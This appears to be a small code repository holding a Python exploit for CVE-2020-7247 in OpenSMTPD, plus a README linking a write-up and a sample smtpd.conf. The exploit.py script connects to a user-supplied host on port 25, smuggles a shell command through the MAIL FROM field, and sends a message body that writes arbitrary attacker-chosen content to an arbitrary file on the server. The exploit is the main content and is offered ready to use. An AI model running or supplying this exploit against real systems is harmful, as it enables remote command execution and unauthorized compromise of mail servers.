├── README.md ├── exploit.py └── smtpd.conf /README.md: -------------------------------------------------------------------------------- 1 | # cve-2020-7247-exploit 2 | Python exploit of cve-2020-7247 3 | 4 | 5 | Read about the vulnerability: 6 | https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/ 7 | -------------------------------------------------------------------------------- /exploit.py: -------------------------------------------------------------------------------- 1 | import socket, time 2 | import sys 3 | 4 | HOST = input("what is the ip address of the host?: ") 5 | PORT = 25 # The same port as used by the server 6 | s = None 7 | 8 | writeto = input("Which file do you want to write to?: ")#raw inputen 9 | writewhat = input("What do you want to write to the file?: ") 10 | payload = b"""\r\n 11 | 12 | #0\r\n 13 | #1\r\n 14 | #2\r\n 15 | #3\r\n 16 | #4\r\n 17 | #5\r\n 18 | #6\r\n 19 | #7\r\n 20 | #8\r\n 21 | #9\r\n 22 | #a\r\n 23 | #b\r\n 24 | #c\r\n 25 | #d\r\n 26 | echo '"""+writewhat.encode()+b"""' > """+writeto.encode()+b""" 27 | . 28 | """ 29 | 30 | for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM): 31 | af, socktype, proto, canonname, sa = res 32 | try: 33 | s = socket.socket(af, socktype, proto) 34 | except OSError as msg: 35 | s = None 36 | continue 37 | try: 38 | s.connect(sa) 39 | except OSError as msg: 40 | s.close() 41 | s = None 42 | continue 43 | break 44 | if s is None: 45 | print('could not open socket') 46 | sys.exit(1) 47 | with s: 48 | data = s.recv(1024) 49 | print('Received', repr(data)) 50 | time.sleep(1) 51 | print('sending') 52 | s.send(b"helo test.com\r\n") 53 | data = s.recv(1024) 54 | print('Received', repr(data)) 55 | s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n") 56 | time.sleep(1) 57 | data = s.recv(1024) 58 | print('Received', repr(data)) 59 | s.send(b"RCPT TO:\r\n") 60 | data = s.recv(1024) 61 | print('Received', repr(data)) 62 | s.send(b"DATA\r\n") 63 | data = s.recv(1024) 64 | print('Received', repr(data)) 65 | s.send(payload) 66 | data = s.recv(1024) 67 | print('Received', repr(data)) 68 | s.send(b"QUIT\r\n") 69 | data = s.recv(1024) 70 | print('Received', repr(data)) 71 | print("done") 72 | s.close() 73 | -------------------------------------------------------------------------------- /smtpd.conf: -------------------------------------------------------------------------------- 1 | # $OpenBSD: smtpd.conf,v 1.9 2016/05/03 18:43:45 jung Exp $ 2 | 3 | # This is the smtpd server system-wide configuration file. 4 | # See smtpd.conf(5) for more information. 5 | 6 | 7 | # Uncomment the following to accept external mail for domain "example.org" 8 | # 9 | # accept from any for domain "example.org" alias deliver to mbox 10 | #accept for local deliver to mbox 11 | #accept from local for any relay 12 | table aliases file:/etc/mail/aliases 13 | table secrets file:/etc/mail/secrets 14 | 15 | listen on lo0 16 | 17 | action "local" mbox alias 18 | action "relay" relay host smtp+tls://bob@smtp.example.com \ 19 | auth 20 | 21 | match for local action "local" 22 | match for any action "relay" 23 | --------------------------------------------------------------------------------